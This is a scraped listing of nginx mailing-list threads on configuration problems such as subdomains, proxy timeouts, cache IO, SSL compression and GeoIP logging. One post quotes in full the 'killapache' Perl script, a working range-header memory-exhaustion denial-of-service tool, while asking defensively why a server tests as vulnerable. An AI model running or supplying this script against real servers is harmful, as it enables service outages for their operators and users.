Quantcast
Channel: Nginx Forum - Nginx Mailing List - English
Viewing all 7229 articles
Browse latest View live

Subdomain configuration problem (1 reply)

$
0
0
Hi,

I'm beginner in nginx, and i have searched google and mailing list but no
luck.

my nginx.conf:

http{
server{
listen 80;
server_name example.com www.example.com;
location / {
proxy_pass http://127.0.0.1:aaaa/;
}
}
server{
listen 80;
server_name subdomain.example.com;
location / {
proxy_pass http://127.0.0.1:bbbb/;
}
}
#rest of the default config like acces log, etc
}



Problem is after adding server block for subdomain, both request (
example.com, subdomain.example.com) loading only example.com in browser.
If i place subdomain server block listing as first one, both request (
example.com, subdomain.example.com) loading subdomain.example.com in
browser.

Please suggest me what could be the problem.


Thanks in Advance!!
_______________________________________________
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx

Nginx 1.8 proxying to Netty - timeout from upstream (1 reply)

$
0
0
I have setup Nginx proxy to a Netty server. I am seeing a timeout from upstream, i.e. Netty. The consequence of this timeout is that the JSON payload response is truncated (as seen on browser developer tools)

2015/07/21 05:08:56 [error] 6#0: *19 upstream prematurely closed connection while reading upstream, client: 198.147.191.15, server: sbox-wus-ui.cloudapp.net, request: "GET /api/v1/entities/DEVICE HTTP/1.1", upstream: "http://10.0.3.4:8080/api/v1/entities/DEVICE", host: "sbox-wus-ui.cloudapp.net", referrer: "https://sbox-wus-ui.cloudapp.net/home.html"

So, yes I initially thought that this is a Netty issue. However, when I make the same API call on Netty I am able to the retrieve the full JSON payload.

The JSON response message size is about 13k. The JSON response I see on the Nginx side is 10K. After spending some time reading up on the Nginx configuration parameters, I added client_body_temp and proxy_temp but to no avail. Any help is really appreciated.

Nginx details:

nginx version: nginx/1.8.0
built by gcc 4.8.2 20140120 (Red Hat 4.8.2-16) (GCC)
built with OpenSSL 1.0.1e-fips 11 Feb 2013
TLS SNI support enabled
configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid --lock-path=/var/run/nginx.lock --http-client-body-temp-path=/var/cache/nginx/client_temp --http-proxy-temp-path=/var/cache/nginx/proxy_temp --http-fastcgi-temp-path=/var/cache/nginx/fastcgi_temp --http-uwsgi-temp-path=/var/cache/nginx/uwsgi_temp --http-scgi-temp-path=/var/cache/nginx/scgi_temp --user=nginx --group=nginx --with-http_ssl_module --with-http_realip_module --with-http_addition_module --with-http_sub_module --with-http_dav_module --with-http_flv_module --with-http_mp4_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_random_index_module --with-http_secure_link_module --with-http_stub_status_module --with-http_auth_request_module --with-mail --with-mail_ssl_module --with-file-aio --with-ipv6 --with-http_spdy_module --with-cc-opt='-O2 -g -pipe -Wp,-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector --param=ssp-buffer-size=4 -m64 -mtune=generic'

-----

# For more information on configuration, see:
# * Official English Documentation: http://nginx.org/en/docs/
# * Official Russian Documentation: http://nginx.org/ru/docs/

user nginx;
worker_processes 1;
daemon off;

error_log {{logDir}}/error.log;

pid /run/nginx.pid;


events {
worker_connections 1024;
}


http {
include /etc/nginx/mime.types;
default_type application/octet-stream;

log_format main '$remote_addr - $remote_user [$time_local] "$request" '
'$status $body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for"';

access_log {{logDir}}/access.log main;

sendfile on;
#tcp_nopush on;

#keepalive_timeout 0;
keepalive_timeout 65;

chunked_transfer_encoding off;

# Disable constraints on potential large uploads resulting in HTTP 413 #
client_max_body_size 0;

#gzip on;

index index.html index.htm;

upstream netty { {% for netty in servers %}
server {{netty}}; {% endfor %}
}

# Load modular configuration files from the /etc/nginx/conf.d directory.
# See http://nginx.org/en/docs/ngx_core_module.html#include
# for more information.
include /etc/nginx/conf.d/*.conf;

server {
listen 80;
server_name {{serverName}};
rewrite ^ https://$server_name$request_uri? permanent;
}

server {
listen 443 ssl;
server_name {{serverName}};
ssl_certificate /data/nginx/cert/{{crtFile}};
ssl_certificate_key /data/nginx/cert/{{keyFile}};

root /usr/share/nginx/html;

#charset koi8-r;

#access_log /var/log/nginx/host.access.log main;

# Load configuration files for the default server block.
include /etc/nginx/default.d/*.conf;

#The only resource available to check health
location /health {
root /apps/nginx/f2;
index index.html;
}

location / {
client_body_buffer_size 128k;

client_body_temp_path /apps/nginx/client_body_temp;

proxy_connect_timeout 90;
proxy_send_timeout 90;
proxy_read_timeout 90;

proxy_buffer_size 4k;
proxy_buffers 4 32k;
proxy_busy_buffers_size 64k;
proxy_temp_file_write_size 64k;
proxy_temp_path /apps/nginx/proxy_temp;
root /apps/nginx/f2;
index index.html;
{% if basicAuth == "true" %}
auth_basic "Restricted";
auth_basic_user_file /data/nginx/cert/htpasswd;
{% endif %}
}

location /ui/ {
proxy_pass http://netty;
{% if basicAuth == "true" %}
auth_basic "Restricted";
auth_basic_user_file /data/nginx/cert/htpasswd;
{% endif %}
}

location /api/ {
proxy_pass http://netty;
}

location /sales/ {
root /apps/nginx/f2;
index index.html;
{% if basicAuth == "true" %}
auth_basic "Restricted";
auth_basic_user_file /data/nginx/cert/htpasswd;
{% endif %}
}


# redirect server error pages to the static page /40x.html
#
error_page 404 /404.html;
location = /40x.html {
}

# redirect server error pages to the static page /50x.html
#
error_page 500 502 503 504 /50x.html;
location = /50x.html {
}
}
}

Fetching a string by parsing URL (6 replies)

$
0
0
I have a web server sitting behind Nginx. If there is an error, then I want to fetch some information from the url and pass it on to a static file as parameters. I have configured Nginx to fetch the query parameters from the url using $arg_param_name.

However, I also need to fetch a String from the url path itself. For instance, if the url is "www.website.com/path1/path2?arg1=val&arg2=someval", how can I parse this url to fetch the last path (path2 in this case)? My location directive is as below:

location ~*/path1/{
...
}

The url, however, need not always have the same number of paths. It can also have 3 paths. So I can't use $1, $2 etc. I need to fetch the last path, i.e the path which is immediately followed by the query parameters (the ? symbol). Is it possible to do this using Nginx directly?

Thanks.

proxy_pass redirection (1 reply)

$
0
0
Hi,
I'm new to Nginx and we are using for reverse proxy.

I'm able to configured Nginx and it's working but I've challenge in
configuring it for Dynamic proxy_pass. I've tried to use wild characters
in proxy_pass it's not working, please help.

E.G.
location
server {
#listen 443;
listen 8080;
#server_name analyticstest.isyntax.net;
server_name IP;

/api/ingestion/ {
proxy_set_header HOST $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffers 8 512k;
proxy_buffer_size 2024k;
proxy_busy_buffers_size 2024k;
proxy_read_timeout 3000;
add_header Cache-Control no-cache;
#rewrite ^/api/query/(.*)$ /$1;
proxy_pass http://IP:8881/ingestion/v1.0/streams/NGINEX; (IP:
hostname of the server where the service
system)

In my case, in the above link last word NGINEX can be any other name, so
how I can dynamically configure for that word.
I tried using wild characters like *, . & _ are not working. Please
help.

Thank you

--
Posted via http://www.ruby-forum.com/.

_______________________________________________
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx

How to run nginx unit tests? (2 replies)

$
0
0
Hello .. I just built and installed nginx on my Linux system. Are there any unit/smoke/regression tests available to test the install?

Thanks for your help.

Doubt about killapache attack on nginx server (no replies)

$
0
0
Hi, I am running nginx 1.0.11 standalone. Recently someone told me that my server is vulnerable to apache killer attack because when he run the following script, it shows "host seems vuln". I searched on this forum and found that "First of all, nginx doesn't favor HEAD requests with compression, so the exact mentioned attack doesn't work against a standalone nginx installation." Also, I checked the source file "src/http/modules/ngx_http_range_filter_module.c", I think it should have been patched to prevent handling malicious range requests. Any idea why it still shows "host seems vuln"? Thanks a lot!

----------------------------------------------------------------- killapache script ---------------------------------------------------------------
use IO::Socket;

use Parallel::ForkManager;

sub usage {

print "Apache Remote Denial of Service (memory exhaustion)\n";

print "by Kingcope\n";

print "usage: perl killapache.pl <host> [numforks]\n";

print "example: perl killapache.pl www.example.com 50\n";

}



sub killapache {

print "ATTACKING $ARGV[0] [using $numforks forks]\n";



$pm = new Parallel::ForkManager($numforks);



$|=1;

srand(time());

$p = "";

for ($k=0;$k<1300;$k++) {

$p .= ",5-$k";

}



for ($k=0;$k<$numforks;$k++) {

my $pid = $pm->start and next;



$x = "";

my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => "80",

Proto => 'tcp');



$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";

print $sock $p;



while(<$sock>) {

}

$pm->finish;

}

$pm->wait_all_children;

print ":pPpPpppPpPPppPpppPp\n";

}



sub testapache {

my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => "80",

Proto => 'tcp');



$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";

print $sock $p;



$x = <$sock>;

if ($x =~ /Partial/) {

print "host seems vuln\n";

return 1;

} else {

return 0;

}

}



if ($#ARGV < 0) {

usage;

exit;

}



if ($#ARGV > 1) {

$numforks = $ARGV[1];

} else {$numforks = 50;}



$v = testapache();

if ($v == 0) {

print "Host does not seem vulnerable\n";

exit;

}

while(1) {

killapache();

}

Tweak fastcgi_buffer (no replies)

$
0
0
Hello,

I need to tweak fastcgi_buffer to 1m on a website that has heavy requests
to avoid buffer. If I use a distro with 4096 pagesize, is it better to do
256x 4k or 4x 256k?

[root@web ~]# getconf PAGESIZE
4096
[root@web ~]#

fastcgi_buffer_size 4k;
fastcgi_buffers 256 4k;

OR

fastcgi_buffer_size 256k;
fastcgi_buffers 4 256k;

Thanks!

Karl
_______________________________________________
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx

Nginx writing to Cephfs (2 replies)

$
0
0
Hello,

I'm having an issue with nginx writing to cephfs. Often I'm getting:

writev() "/home/ceph/temp/44/94/1/0000119444" failed (4: Interrupted
system call) while reading upstream

looking with strace, this happens:

....
write(65, "e\314\366\36\302"..., 65536) = ? ERESTARTSYS (To be restarted)

It happens after first 4MBs (exactly) are written, subsequent write gets
ERESTARTSYS (sometimes, but more rarely, it fails after first 32 or
64MBs, etc are written). Apparently nginx doesn't expect this and
doesn't handle it so it cancels writes and deletes this partial file.
Looking at the code, I saw it doesn't handle ERESTARTSYS in any
different way compared to other write errors. Shouldn't it try to write
same data again for a couple of times before finally giving up and
erroring out? Do you have any suggestions on how to resolve this? I'm
using latest stable nginx.


Regards,
Vedran

_______________________________________________
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx

keepalive_timeout timeout causes high TTFB (1 reply)

$
0
0
I am trying to further optimize SSL but if i enable keepalive_timeout i get high TTFB as shown in the report below

http://tools.pingdom.com/fpt/#!/KggzF

When i disable keepalive_timeout , TTFB is fixed but nginx recommand keepalive_timeout : http://nginx.org/en/docs/http/configuring_https_servers.html

Why does this happen ?

I welcome any other advice to further optimise SSL

Thanks

listen 443 spdy default_server reuseport;
ssl on;
ssl_certificate /etc/ssl/filterbypass.me.crt; #(or .pem)
ssl_certificate_key /etc/ssl/filterbypass.me.key.nopass;
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
#keepalive_timeout 70;
#ssl_ciphers ECDHE-RSA-AES256-SHA384:AES256-SHA256:RC4:HIGH:!MD5:!aNULL:!eNULL:!NULL:!DH:!EDH:!AESGCM;
ssl_ciphers ECDH+AESGCM:DH+AESGCM:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:ECDH+3DES:DH+3DES:RSA+AESGCM:RSA+AES:RSA+3DES:!aNULL:!MD5:!DSS;
ssl_prefer_server_ciphers on;
ssl_buffer_size 8k;
ssl_session_cache shared:SSL:20m;
ssl_dhparam /etc/ssl/dhparam.pem;
ssl_session_timeout 45m;
ssl_stapling on;
ssl_stapling_verify on;
ssl_trusted_certificate /etc/ssl/trustchain.crt;
resolver 8.8.8.8 8.8.4.4 valid=300s;
resolver_timeout 5s;
add_header Strict-Transport-Security "max-age=31536000; includeSubDomains";

Optimzing hard drive IO for proxy_pass (no replies)

$
0
0
I have server A with a large HDD at IDC 1 (TB hdd)
I have server B with cheap bandwidth at IDC 2 (very small virtual server 20
GB hdd)

I send all image requests to server B, and it caches from A.
My problem is that on server IO is really high

Server B iostat
Device: rrqm/s wrqm/s r/s w/s rsec/s wsec/s avgrq-sz
avgqu-sz await svctm %util
sda 34.01 517.21 1263.36 76.72 19922.27 4751.42 18.41
2.95 2.20 0.36 47.67
sda1 0.00 0.00 0.00 0.00 0.00 0.00 0.00
0.00 0.00 0.00 0.00
sda2 34.01 517.21 1263.36 76.72 19922.27 4751.42 18.41
2.95 2.20 0.36 47.67
dm-0 0.00 0.00 1297.37 593.93 19922.27 4751.42 13.05
8.78 4.64 0.25 47.71
dm-1 0.00 0.00 0.00 0.00 0.00 0.00 0.00
0.00 0.00 0.00 0.00

Here is my related nginx config
--------------- cut --------------------------------------
proxy_cache_path /cache levels=1:2
keys_zone=MEDIA:200m
inactive=2d max_size=6g;
--------------- cut --------------------------------------
location / {
proxy_pass http://SERVER_A http://server_a/
proxy_cache MEDIA;
proxy_cache_key "$scheme$request_uri";

proxy_cache_valid 200 302 304 7d;
proxy_cache_valid 301 1h;
proxy_cache_valid any 1m;
proxy_cache_use_stale error timeout invalid_header http_500
http_502 http_503 http_504 http_404 updating;
proxy_ignore_headers Cache-Control Expires
Set-Cookie;
proxy_cache_min_uses 3;
proxy_cache_lock on;
proxy_cache_lock_timeout 15s;

expires 7d;
}
--------------- cut --------------------------------------

Server B has nothing else running.
Server B is sending about 200~400 MBs traffic outside
Is such a high IO load normal?
Is there a way I can decrease the IO load while keeping the caching of
server B efficient?

Thank you.
_______________________________________________
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx

upstart conf for managing nginx (1 reply)

$
0
0
Hello,
I wrote a small upstart script to stop/start nginx through upstart. This is
how it looks

description "nginx http daemon"
start on (filesystem and net-device-up IFACE=lo)
stop on runlevel [!2345]
expect deamon
respawn
respawn limit 10 5
chdir /usr/local/nginx
exec ./nginx


I am running nginx from "/usr/local/nginx", and running as a user with
super user.

Still it hangs on start/stop command. Any idea what I may be missing..
Thanks,
Vikrant
_______________________________________________
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx

Alias regex use causing core dump as of nginx 1.7.1 (2 replies)

$
0
0
Hi, after upgrading from the v1.6.3 to v1.8.0 stable branch an alias I used for Roundcubemail no longer works.
I traced the issue back to a probable change made in nginx v1.7.1:
"Bugfix: the "alias" directive used inside a location given by a regular expression worked incorrectly if the "if" or "limit_except" directives were used."

In version 1.6.3 and 1.7.0 the following works fine:
## Roundcubemail for Remi repository
location ~ ^/mail/(.+\.php)$ {
alias /usr/share/roundcubemail/$1;
client_max_body_size 5M;
fastcgi_pass _php;
}
location ~ /mail {
alias /usr/share/roundcubemail/;
client_max_body_size 5M;
try_files $uri $uri/ /index.php;
}

But in v1.7.1 it causes nginx to core dump if I visit the url domain.com/mail and if I visit domain.com/mail/ I get taken to the front page.

[notice] 26221#0: signal 17 (SIGCHLD) received
[alert] 26221#0: worker process 26223 exited on signal 11 (core dumped)
[notice] 26221#0: start worker process 26231
[notice] 26221#0: signal 29 (SIGIO) received

Optimzing hard drive IO for proxy_pass (1 reply)

$
0
0
I have server A with a large HDD at IDC 1 (TB hdd)
I have server B with cheap bandwidth at IDC 2 (very small virtual server 20
GB hdd)

I send all image requests to server B, and it caches from A.
My problem is that on server IO is really high

Server B iostat
Device: rrqm/s wrqm/s r/s w/s rsec/s wsec/s avgrq-sz
avgqu-sz await svctm %util
sda 34.01 517.21 1263.36 76.72 19922.27 4751.42 18.41
2.95 2.20 0.36 47.67
sda1 0.00 0.00 0.00 0.00 0.00 0.00 0.00
0.00 0.00 0.00 0.00
sda2 34.01 517.21 1263.36 76.72 19922.27 4751.42 18.41
2.95 2.20 0.36 47.67
dm-0 0.00 0.00 1297.37 593.93 19922.27 4751.42 13.05
8.78 4.64 0.25 47.71
dm-1 0.00 0.00 0.00 0.00 0.00 0.00 0.00
0.00 0.00 0.00 0.00

Here is my related nginx config
--------------- cut --------------------------------------
proxy_cache_path /cache levels=1:2
keys_zone=MEDIA:200m
inactive=2d max_size=6g;
--------------- cut --------------------------------------
location / {
proxy_pass http://SERVER_A http://server_a/
proxy_cache MEDIA;
proxy_cache_key "$scheme$request_uri";

proxy_cache_valid 200 302 304 7d;
proxy_cache_valid 301 1h;
proxy_cache_valid any 1m;
proxy_cache_use_stale error timeout invalid_header http_500
http_502 http_503 http_504 http_404 updating;
proxy_ignore_headers Cache-Control Expires
Set-Cookie;
proxy_cache_min_uses 3;
proxy_cache_revalidate on;
proxy_cache_lock on;
proxy_cache_lock_timeout 15s;

expires 7d;
}
--------------- cut --------------------------------------

Server B has nothing else running.
Server B is sending about 200~400 MBs traffic outside
Is such a high IO load normal?
Is there a way I can decrease the IO load while keeping the caching of
server B efficient?

Thank you.
_______________________________________________
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx

Using dynamic access_log, automatically create parent directory (no replies)

$
0
0
We use a dynamic value for access logs:

access_log /var/log/nginx/domains/$host/access.log main;

However, if the $host directory does not exist in /var/log/nginx/domains nginx fails with an error creating the access log. Is there a way to have nginx create the $host directory automatically instead of failing?

Seems like this should be default behavior?

Nginx response with persistence session and backend server failure (2 replies)

$
0
0
Hello all,

I was reading Nginx documentation
<http://nginx.org/en/docs/http/ngx_http_upstream_module.html?&_ga=1.189051176.2090890265.1437394769#sticky_cookie>
on
persistence session using cookie and below is from documentation

A request that comes from a client not yet bound to a particular server is
passed to the server selected by the configured balancing method. Further
requests with this cookie will be passed to the designated server. *If the
designated server cannot process a request*, *the new server is selected as
if the client has not been bound yet*.

The last line says that

*If the designated server cannot process a request*.

What does it mean to say "the server cannot process a request."

Question 1:
Does it mean the server was down ?
or does it mean server responded with some error code ?
or does it mean that it did not responded in a certain time interval ?
or does it mean that max number of connection limit is reached on that
server ?

Question 2:
Let say there were 3 backend-server and we are using session persistence
using cookie.
Now assume that 2 of the backed server goes down so niginx will route all
request to 3rd server
Now 2 other server came back online, will niginx use the other 2 server to
route the request even if request have the persistence cookie for 3rd
server.


Thanks
_______________________________________________
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx

GeoIP data in access_log Nginx (1 reply)

$
0
0
Hello World,

I would like to know if is possible to put GeoIP data (country for exemple) in my log access (nginx)
I enabled the GeoIP module in my nginx (configure) and i would like to use the "$geoip_country_name" and "$geoip_city" in my accesslog
I tried to add the two variables in my log format (main) but without success

log_format main
'$host $remote_addr - $remote_user [$time_local] "$request" '
'$status $body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for" "$request_time" "$upstream_cache_status" "$geoip_country_name" "$geoip_city"';

Result :

my.domain.fr xxx.xxx.xxx.xxx - - [22/Jul/2015:17:14:21 +0200] "GET /test.html HTTP/1.0" 404 564 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36" "0.001" "HIT" "-" "-"

But i would like this one :

my.domain.fr xxx.xxx.xxx.xxx - - [22/Jul/2015:17:14:21 +0200] "GET /test.html HTTP/1.0" 404 564 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36" "0.001" "HIT" "FR" "Paris"

Thanks for your help,

Best regards,
Jugurtha

Is SSL and Compression never secure in nginx? (3 replies)

$
0
0
Hi,

I am working in a project where a password-protected extranet application
is behind an nginx proxy using ssl.

Now I asked the admin to enable server-side http-compression because we
tend to have rather lengthy json responses from our REST api and they
compress very well and the performance gain would be significant. He
decline doing that, explaining that because of the CRIME vulnerability, it
is not a good idea to enable compression when using ssl with nginx. Is this
really always the case? Are there scenarios where the vulnerability is not
a problem? I am trying to understand this better to make an informed
decision because not using compression (encryption is a must) would incur
other costs (optimizations in the code) and I don't just want to waste that
time and money unless I have to.

Thanks in advance,

Robert
_______________________________________________
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx

log files as non root user (no replies)

$
0
0
Hello Everyone,

I am trying to configure ngnix where logs and pid file are written to a custom path and owned as non root. When even I start ngnix these files are created and owned as root. In ngnix.conf I defined as below. Please advise.

user usradmin mwgroup;
worker_processes 1;

error_log /export/local/opt/ngnix/logs/error.log warn;
pid /export/local/opt/ngnix/logs/nginx.pid;


events {
worker_connections 1024;
}


http {
include /etc/nginx/mime.types;
default_type application/octet-stream;

log_format main '$remote_addr - $remote_user [$time_local] "$request" '
'$status $body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for"';

access_log /export/local/opt/ngnix/logs/access.log main;

sendfile on;
#tcp_nopush on;

keepalive_timeout 65;

#gzip on;

include /etc/nginx/conf.d/*.conf;
}

mp4 streaming/seeking works from firefox (fedora) and not from firefox (windows) (nginx 1.9.3) (no replies)

$
0
0
greetings!

i am seeing an unexplained malfunction here with nginx when serving videos. flv and mp4 files have different symptoms. mp4 streams correctly when i view the file in firefox 39 in fedora 22, but in windows 7 (firefox 39) the file cannot be 'seeked' and must be played linearly.
after speaking with the coders of video.js (the player i use), it was determined that nginx is not returning byte range data appropriately (or at all) - so seeking would not work. however, this does not explain why firefox 39 in fedora works perfectly and does not provide a solution as to how to get nginx to serve correctly.

the only advice i have seen is to change the value of the 'max_ranges' directive - but doing that has made no difference. i have left it as 'unset' - which i understand to mean 'unlimited'.

an example video from the server is here: src="https://www.ureka.org/file/play/17924/censored%20on%20google%202.mp4"

any tips welcomed! thanks

problem with images after refresh website (1 reply)

$
0
0
Hi

i run directadmin+nginx1.8+php5.4 php-fpm

when i do refresh to website the images not refresh good, sometime after refresh it put images in wrong place or double the images
you can look on this website rhost(dot)biz, you can try refresh few times and look on the images and you will see the problem.
what can be the problem?
Viewing all 7229 articles
Browse latest View live


Latest Images

<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>